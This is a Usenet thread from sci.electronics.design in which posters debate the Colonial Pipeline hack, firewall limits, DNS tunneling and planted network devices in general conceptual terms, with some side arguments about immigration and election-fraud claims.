> *placing* the device: "Here's $500 if you will put this device
> in an out of the way location at company X"
>
> Did you recall hearing accounts of US citizens who'd been paid to
> set up domestic accounts that were actually foreign controlled?
> Do you think they understood the consequences of their actions?
> Do you think they would have refused the monies offered had they
> understood (or, would they just have insisted on MORE)?
> >> Have you put filters on all of your incoming mail traffic and WWW responses?
> >>
> >> Are you sure nothing is tunneling through your firewall on some
> >> benign but ubiquitous protocol (like DNS)?
> >
> > Can you explain how this Domain Name Service (DNS) can hid the real IP?
> You use a tunneling protocol to pass *information* out of (and into)
> a firewalled domain. You're still looking for the perp instead
> of focusing on the damage he's doing!
>
> I can put a device inside a protection domain and have it communicate
> with an outside agent without drawing attention to the fact that it
> is doing so. The outside agency can similarly return command and
> control information to that device using that -- or other -- protocols.

As long as your protected domain is in your local ISP. They can track and trace it.

> Lock down DNS and I'll piggyback under HTTP. Or SMTP/POPD. Or
> I'll post coded instructions on a bogus facebook page (that your
> IT department will allow to be viewed simply because your
> employees visit other facebook pages as part of their "internet
> access perk")

So, you are talking about name translations into IPs? Any serious mission critical op would disable these unsecure ports and do reverse IP lookup to verify it's identity.

>
> Your firewall has to be porous for you to conduct your business.
> Because of that, there are always ways to sneak information
> through it.

You don't need to have mission critical machines serving mail and web pages, although they are often doing so.

On 5/17/2021 5:50 PM, Ed Lee wrote:
> On Monday, May 17, 2021 at 5:36:47 PM UTC-7, Don Y wrote:
>> On 5/17/2021 5:22 PM, Ed Lee wrote:
>>> On Monday, May 17, 2021 at 5:02:00 PM UTC-7, Don Y wrote:
>>>> On 5/17/2021 4:39 PM, Ed Lee wrote:
>>>>> On Monday, May 17, 2021 at 4:29:00 PM UTC-7, Don Y wrote:
>>
>>>>> Confiscating Mary's PC broke the chain. Whether they catch Tom or
>>>>> not, there is no more damage.
>>>> No, it didn't. Betty's computer is ready to step in and assume the
>>>> role -- the pipeline is under the hacker's control so THEY decide how
>>>> that control is implemented. All you can do is cut your connection to
>>>> the outside world. In which case, the hackers have achieved their goal
>>>> and can wait for you to try to bring things back on-line.
>>>
>>> The important point is blocking access with firewall before they get
>>> access through Mary, Betty and Tom.
>> Your initial claim was to block russian and chinese IPs. I proposed a
>> method by which russian/chinese-based hackers could compromise a computer
>> located WITHIN *your* claimed protection domain ("The US").
>>
>> Make that as small as you want and the attack still succeeds; it just
>> means the attacker has to target a smaller set of "allowed hosts" (like
>> John, Head of Pipeline Operations)
>>
>> Hey, maybe you can block John, too! (then what value to remote access?)
>
> They don't have to block John, but he will be the first to be visited by
> authority.

So what? He, who should be focused on fixing the breach, is now
dealing with authorities mucking around with his kit.

Once subverted, the targeted device could be pointed at some other
IP for C&C. Unless there is a persistent trace of the actions
that implemented this, on John's PC, the only way to know where
the new C&C is would be to deal with the actual hacked node(s).

So, John has just been inconvenienced and stepped over. The
hack continues.

>>>> [You should recommend them to the FBI and NSA to take on *their*
>>>> responsibilities!] Did you remove all of the floppy disks, USB ports,
>>>> CD/DVD drives and other mechanisms that can be used to *locally*
>>>> inject software into a machine INSIDE the firewalled domain?
>>>
>>> These would require local accesses to machines, which are easier to
>>> guard against.
>> Did you read the PwnPlug article? Did you note how the Bank Officials
>> WELCOMED the guy onto their premises who placed the device?
>>
>> How many people wander around your average business in the course of
>> performing their normal duties? Plumbers, carpenters, electricians, etc.
>> They don't have to KNOW how to use a device to be exploited in *placing*
>> the device: "Here's $500 if you will put this device in an out of the way
>> location at company X"
>>
>> Did you recall hearing accounts of US citizens who'd been paid to set up
>> domestic accounts that were actually foreign controlled? Do you think they
>> understood the consequences of their actions? Do you think they would have
>> refused the monies offered had they understood (or, would they just have
>> insisted on MORE)?
>>>> Have you put filters on all of your incoming mail traffic and WWW
>>>> responses?
>>>>
>>>> Are you sure nothing is tunneling through your firewall on some benign
>>>> but ubiquitous protocol (like DNS)?
>>>
>>> Can you explain how this Domain Name Service (DNS) can hid the real IP?
>> You use a tunneling protocol to pass *information* out of (and into) a
>> firewalled domain. You're still looking for the perp instead of focusing
>> on the damage he's doing!
>>
>> I can put a device inside a protection domain and have it communicate with
>> an outside agent without drawing attention to the fact that it is doing
>> so. The outside agency can similarly return command and control
>> information to that device using that -- or other -- protocols.
>
> As long as your protected domain is in your local ISP. They can track and
> trace it.

Again, so what? You know the first hop on the list of C&C devices
involved. Hey, it's Mary Smith, again! You're spending resources
trying to hold someone accountable instead of protecting the
asset.

Many of us had master keys at my school. No, we weren't SUPPOSED to have
them. But, they were often convenient; getting into labs that may have been
locked down after hours, etc.

They were grudgingly tolerated -- it costs a small fortune to rekey
thousands of mechanical locks. And, with a student body consisting
*entirely* of engineer-wannabes, how long do you think it would take before
a NEW master key would surface??

The culture that developed was simple and practical. "Don't do anything
that will make us WANT to find you!" And, on the other side, "Don't
carry a master key in a readily discoverable location on your person"
(possession was /prima facie/ grounds for expulsion)

The idea of physically searching every student in the hop of
finding someone foolish enough to have one on their person was
an overhead that would likely yield NO results. The idea of
catching someone in the act of using one was similarly unproductive
(too much real estate to cover and surveillance cameras weren't
commonplace)

Instead, the threat of being expelled (prestigious school) kept
folks honest. It didn't do away with master keys -- just the
undesirable uses of them! Much lower "costs" and focused on
protecting assets, instead of hunting down perps.

>> Lock down DNS and I'll piggyback under HTTP. Or SMTP/POPD. Or I'll post
>> coded instructions on a bogus facebook page (that your IT department will
>> allow to be viewed simply because your employees visit other facebook
>> pages as part of their "internet access perk")
>
> So, you are talking about name translations into IPs? Any serious mission
> critical op would disable these unsecure ports and do reverse IP lookup to
> verify it's identity

DNS has legitimate use for a device inside a firewalled domain.
You can verify the identity -- and, if the targeted domain has
been hacked, what does that tell you about the actual hacker
who is leveraging their DNS domain? (nothing!)

Ever notice an FTP site set up in someplace "unexpected"?
And, likely not known by the hosting entity??

>> Your firewall has to be porous for you to conduct your business. Because
>> of that, there are always ways to sneak information through it.
>
> You don't need to have mission critical machines serving mail and web pages,
> although they are often doing so.

It doesn't have to be "mission critical". It just has to be a service that
can freely permeate the firewall. Because it experiences traffic "of that
sort" as a normal act of its operation.

If I see incoming traffic on port 53, I raise an eyebrow as my DNS is not
publicly accessible. But, I *expect* to see traffic on the ports exposed
by my web browser as I surf the net. Am I *sure* that all of that is
"as intended"?

In article <MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>,
Ralph Mowery <rmowery42@charter.net> wrote:
>In article <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
>edward.ming.lee@gmail.com says...
>>
>> > The silly part is guessing as to what was wrong and then speculating on how to fix it.
>>
>> The wrong thing was having foreign access to mission critical computers.
>>
>>
>
>The real wrong thing is to put anything on the internet where it can be
>accessed. While even a hard wired setup can be hacked, it would be much
>more difficult.

I worked with the Netherlands tax office. They had a country wide net
totally separate from the Internet. If I wanted to google something, I
had to go to the internet computer in a different room. Of course most
plants have not even a need for a country wide net.

Groetjes Albert

>
>
--
"in our communism country Viet Nam, people are forced to be
alive and in the western country like US, people are free to
die from Covid 19 lol" duc ha
albert@spe&ar&c.xs4all.nl &=n http://home.hccnet.nl/a.w.m.van.der.horst

On Monday, May 17, 2021 at 7:16:00 PM UTC-4, Ed Lee wrote:
> On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> > On 5/17/2021 2:12 PM, Ed Lee wrote:
> >
> > > As long as proxies and/or original attack servers are in the US, they can
> > > send the FBI there. If they are from Russia, perhaps Putin would send the
> > > KGB there to help them.
> > The damage is still done. Are you going to arrest Mary Smith
> > because HER computer was used to shut down the centrifuges that
> > were processing the Uranium? You might hassle her and leave
> > her thinking that she should never open an email attachment
> > (or visit the "housewives for democracy" website). But,
> > you're still left with a crippled bit of infrastructure
> > and a "connection" that goes off to the next guy down the chain.
> They can confiscate Mary's PC and start tracking down the next guy Tom.
> > >> The silly part is guessing as to what was wrong and then speculating on
> > >> how to fix it.
> > >
> > > The wrong thing was having foreign access to mission critical computers.
> > The wrong thing was not having SECURE *remote* access (assuming remote
> > access was necessary).
> >
> > You can spoof a MAC or IP address; it's not rocket science. You
> > can't KNOW where the connection is coming from.
> You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.
> > You can limit maintenance activities to OUTBOUND connections
> > (i.e., have the kit contact a "known" computer). But, would
> > have to hardwire an IP address to avoid DNS cache poisoning
> > effects. And, a dedicated hacker could still locate a device
> > "somewhere" that convinces the routers involved that *it*
> > is the legitimate hardwired IP address.
> >
> > (you *did* note the pwn plug reference I made, earlier?
> > Imagine *it* was sitting on John, Head of Pipeline Operations'
> > computer. *It* would appear to be the legitimate target of any
> > maintenance transactions if it filtered traffic to John's
> > *real* PC)
> Port scanning, intrusion and proxy take days. The authority would have time to shutdown John's PC, if it's in the US.
> > Security is hard. Just thinking you can slap some bandaid
> > or "guard" on a system is blissful ignorance.
> That doesn't mean we just let it wide open, without blocking anything.

The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!

--

Rick C.

+-+ Get 1,000 miles of free Supercharging
+-+ Tesla referral code - https://ts.la/richard11209

In article <79a376df-22f0-4c8e-96c6-4f3581e0d456n@googlegroups.com>,
gnuarm.deletethisbit@gmail.com says...
>
> The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!
>
>
>

Reports are there are over 35 million illegal people in the US . The do
not seem to be able to track or do anything with them but feed and house
them when found.

On Tuesday, May 18, 2021 at 10:01:17 AM UTC-4, Ralph Mowery wrote:
> In article <79a376df-22f0-4c8e...@googlegroups.com>,
> gnuarm.del...@gmail.com says...
> >
> > The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!
> >
> >
> >
> Reports are there are over 35 million illegal people in the US . The do
> not seem to be able to track or do anything with them but feed and house
> them when found.

What does that have to do with anything???

--

Rick C.

++- Get 1,000 miles of free Supercharging
++- Tesla referral code - https://ts.la/richard11209

albert wrote:
> In article <MPG.3b0cb399adffcb3d9897af@news.eternal-september.org>,
> Ralph Mowery <rmowery42@charter.net> wrote:
>> In article <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
>> edward.ming.lee@gmail.com says...
>>>
>>>> The silly part is guessing as to what was wrong and then speculating on how to fix it.
>>>
>>> The wrong thing was having foreign access to mission critical computers.
>>>
>>>
>>
>> The real wrong thing is to put anything on the internet where it can be
>> accessed. While even a hard wired setup can be hacked, it would be much
>> more difficult.
>
> I worked with the Netherlands tax office. They had a country wide net
> totally separate from the Internet. If I wanted to google something, I
> had to go to the internet computer in a different room. Of course most
> plants have not even a need for a country wide net.

I sort of doubt that they ran all their own wires, though, so it must
have been either on the phone or cable network, or else tunnelled over IP.

Cheers

Phil Hobbs

--
Dr Philip C D Hobbs
Principal Consultant
ElectroOptical Innovations LLC / Hobbs ElectroOptics
Optics, Electro-optics, Photonics, Analog Electronics
Briarcliff Manor NY 10510

http://electrooptical.net
http://hobbs-eo.com

On Tuesday, May 18, 2021 at 11:09:48 AM UTC-4, Phil Hobbs wrote:
> albert wrote:
> > In article <MPG.3b0cb399a...@news.eternal-september.org>,
> > Ralph Mowery <rmow...@charter.net> wrote:
> >> In article <86e93215-4a42-459c...@googlegroups.com>,
> >> edward....@gmail.com says...
> >>>
> >>>> The silly part is guessing as to what was wrong and then speculating on how to fix it.
> >>>
> >>> The wrong thing was having foreign access to mission critical computers.
> >>>
> >>>
> >>
> >> The real wrong thing is to put anything on the internet where it can be
> >> accessed. While even a hard wired setup can be hacked, it would be much
> >> more difficult.
> >
> > I worked with the Netherlands tax office. They had a country wide net
> > totally separate from the Internet. If I wanted to google something, I
> > had to go to the internet computer in a different room. Of course most
> > plants have not even a need for a country wide net.
> I sort of doubt that they ran all their own wires, though, so it must
> have been either on the phone or cable network, or else tunnelled over IP..

Voice and data connections have never needed to be on any network as such. Locally the phone company has supplied direct connections between buildings using their wires without going through switching equipment and so not on their "network". Private companies have long used their own microwave links for longer distance communications. These sorts of communications have been used for many decades longer than the Internet has been available. Heck, one company I worked for considered using a microwave link to connect buildings across the street to save on the phone bill.

Even today many power companies have extensive communications using microwave and fiber. Many believe they should use that capability to provide Internet access to rural areas, but the power companies don't want to risk the exposure.

--

Rick C.

+++ Get 1,000 miles of free Supercharging
+++ Tesla referral code - https://ts.la/richard11209

On 5/18/2021 7:01 AM, Ralph Mowery wrote:

> Reports are there are over 35 million illegal people in the US . The do
> not seem to be able to track or do anything with them but feed and house
> them when found.

Sort of like the 3 million ILLEGAL votes allegedly cast in the 2016
election -- and, despite appointing a special commission to track them
down, none seem to have turned up! (and the *7* million that have
been cast in 2020?)

I guess counting seems to be a problem -- especially if you have an 'R'
after your name -- as folks always have to make claims about numbers
without ever managing to back them up. Perhaps once both hands and
feet are in use, the numbers are just too hard to deal with?

One wonders what NEW recount they'll undertake in Arizona after
the latest (third? fourth?) fails to yield all of the "missing
and illegal" votes they ALLEGE? (after hiring a firm that
has no experience doing such... sorta like hiring a plumber
to do brain surgery! Yup, sound reasoning, that!)

On 2021/05/18 11:32 a.m., Don Y wrote:
> On 5/18/2021 7:01 AM, Ralph Mowery wrote:
>
>> Reports are there are over 35 million illegal people in the US . 
The do
>> not seem to be able to track or do anything with them but feed and house
>> them when found.
>
> Sort of like the 3 million ILLEGAL votes allegedly cast in the 2016
> election -- and, despite appointing a special commission to track them
> down, none seem to have turned up!  (and the *7* million that have
> been cast in 2020?)

I suspect they are considered illegal because the votes were against
their candidate.

Such lies breed fascism...not surprisingly.

John :-#(#

On 5/18/2021 12:09 PM, John Robertson wrote:
>
> On 2021/05/18 11:32 a.m., Don Y wrote:
>> On 5/18/2021 7:01 AM, Ralph Mowery wrote:
>>
>>> Reports are there are over 35 million illegal people in the US .
> The do
>>> not seem to be able to track or do anything with them but feed and house
>>> them when found.
>>
>> Sort of like the 3 million ILLEGAL votes allegedly cast in the 2016
>> election -- and, despite appointing a special commission to track them
>> down, none seem to have turned up! (and the *7* million that have
>> been cast in 2020?)
>
> I suspect they are considered illegal because the votes were against their
> candidate.

There may well have been illegal votes cast! But, if you allege
THREE MILLION, you'd think they'd at least be able to find THREE THOUSAND?

> Such lies breed fascism...not surprisingly.

When you have folks who refuse to believe *facts* -- or, who value their
own *self* (interests) above their fellow men -- then you have even
more serious potential problems.

"Everyone who believes in GRAVITY, please move to the FRONT of the room.
Those folks who don't, please move to the CEILING..."

On Friday, May 14, 2021 at 10:05:29 AM UTC-5, Fred Bloggs wrote:
> Probably something to do with Russian porn sites and Baptists:
>
> https://apnews.com/article/va-state-wire-technology-business-1f06c091c492c1630471d29a9cf6529d
>
> Another American farce operation...

Some more problems.
<https://www.dailymail.co.uk/news/article-9592699/Colonial-Pipelines-network-goes-South-suffers-fuel-shortages.html>

Ten thousand stations still didn't have fuel as of Tuesday according to the article.

Google groups troll...

--
Fred Bloggs <bloggs.fredbloggs.fred@gmail.com> wrote:

> X-Received: by 2002:a0c:9e0f:: with SMTP id p15mr46149010qve.27.1621004726300; Fri, 14 May 2021 08:05:26 -0700 (PDT)
> X-Received: by 2002:ad4:4081:: with SMTP id l1mr46415415qvp.24.1621004726135; Fri, 14 May 2021 08:05:26 -0700 (PDT)
> Path: eternal-september.org!reader02.eternal-september.org!feeder1.feed.usenet.farm!feed.usenet.farm!tr1.eu1.usenetexpress.com!feeder.usenetexpress.com!tr2.iad1.usenetexpress.com!border1.nntp.dca1.giganews.com!nntp.giganews.com!news-out.google.com!nntp.google.com!postnews.google.com!google-groups.googlegroups.com!not-for-mail
> Newsgroups: sci.electronics.design
> Date: Fri, 14 May 2021 08:05:25 -0700 (PDT)
> Injection-Info: google-groups.googlegroups.com; posting-host=2601:5cc:4701:5250:6c14:577c:98ad:d058; posting-account=iGtwSwoAAABNNwPORfvAs6OM4AR9GRHt
> NNTP-Posting-Host: 2601:5cc:4701:5250:6c14:577c:98ad:d058
> User-Agent: G2/1.0
> MIME-Version: 1.0
> Message-ID: <899b7861-8d9a-445b-b583-7b99e3d69260n@googlegroups.com>
> Subject: =?UTF-8?Q?Tech_audit_of_Colonial_Pipeline_found_=E2=80=98glaring=E2=80=99_?= =?UTF-8?Q?problems?=
> From: Fred Bloggs <bloggs.fredbloggs.fred@gmail.com>
> Injection-Date: Fri, 14 May 2021 15:05:26 +0000
> Content-Type: text/plain; charset="UTF-8"
> Lines: 4
> Xref: reader02.eternal-september.org sci.electronics.design:632586
>
> Probably something to do with Russian porn sites and Baptists:
>
> https://apnews.com/article/va-state-wire-technology-business-1f06c091c492c1630471d29a9cf6529d
>
> Another American farce operation...
>
>

Ralph Mowery <rmowery42@charter.net> wrote in
news:MPG.3b0cb399adffcb3d9897af@news.eternal-september.org:

> In article
> <86e93215-4a42-459c-a1b0-a7efe7a216den@googlegroups.com>,
> edward.ming.lee@gmail.com says...
>>
>> > The silly part is guessing as to what was wrong and then
>> > speculating on how to fix it.
>>
>> The wrong thing was having foreign access to mission critical
>> computers.
>>
>>
>
> The real wrong thing is to put anything on the internet where it
> can be accessed. While even a hard wired setup can be hacked, it
> would be much more difficult.
>
>

Is it not Windows based computers we are talking about?

How many Linux run systems are being hacked?

On Tuesday, May 18, 2021 at 5:10:33 AM UTC-7, gnuarm.del...@gmail.com wrote:
> On Monday, May 17, 2021 at 7:16:00 PM UTC-4, Ed Lee wrote:
> > On Monday, May 17, 2021 at 3:16:25 PM UTC-7, Don Y wrote:
> > > On 5/17/2021 2:12 PM, Ed Lee wrote:
> > >
> > > > As long as proxies and/or original attack servers are in the US, they can
> > > > send the FBI there. If they are from Russia, perhaps Putin would send the
> > > > KGB there to help them.
> > > The damage is still done. Are you going to arrest Mary Smith
> > > because HER computer was used to shut down the centrifuges that
> > > were processing the Uranium? You might hassle her and leave
> > > her thinking that she should never open an email attachment
> > > (or visit the "housewives for democracy" website). But,
> > > you're still left with a crippled bit of infrastructure
> > > and a "connection" that goes off to the next guy down the chain.
> > They can confiscate Mary's PC and start tracking down the next guy Tom.
> > > >> The silly part is guessing as to what was wrong and then speculating on
> > > >> how to fix it.
> > > >
> > > > The wrong thing was having foreign access to mission critical computers.
> > > The wrong thing was not having SECURE *remote* access (assuming remote
> > > access was necessary).
> > >
> > > You can spoof a MAC or IP address; it's not rocket science. You
> > > can't KNOW where the connection is coming from.
> > You have to spoof an IP address within range of your ISP. If it's an local ISP, it can be traced.
> > > You can limit maintenance activities to OUTBOUND connections
> > > (i.e., have the kit contact a "known" computer). But, would
> > > have to hardwire an IP address to avoid DNS cache poisoning
> > > effects. And, a dedicated hacker could still locate a device
> > > "somewhere" that convinces the routers involved that *it*
> > > is the legitimate hardwired IP address.
> > >
> > > (you *did* note the pwn plug reference I made, earlier?
> > > Imagine *it* was sitting on John, Head of Pipeline Operations'
> > > computer. *It* would appear to be the legitimate target of any
> > > maintenance transactions if it filtered traffic to John's
> > > *real* PC)
> > Port scanning, intrusion and proxy take days. The authority would have time to shutdown John's PC, if it's in the US.
> > > Security is hard. Just thinking you can slap some bandaid
> > > or "guard" on a system is blissful ignorance.
> > That doesn't mean we just let it wide open, without blocking anything.
> The US can't even manage to track and trace a disease that has killed well over half a million people in this country and you want them to track and trace a computer virus and seize computers!!!

Well, that what the FBI did. Track and trace the IP submitting the wallet address for the bitcoin. Seize the computer (server) and recover the private key. Steal all the coins in that wallet. They got lucky this time. The hackers were stupid enough to put the wallet in server within FBI authority.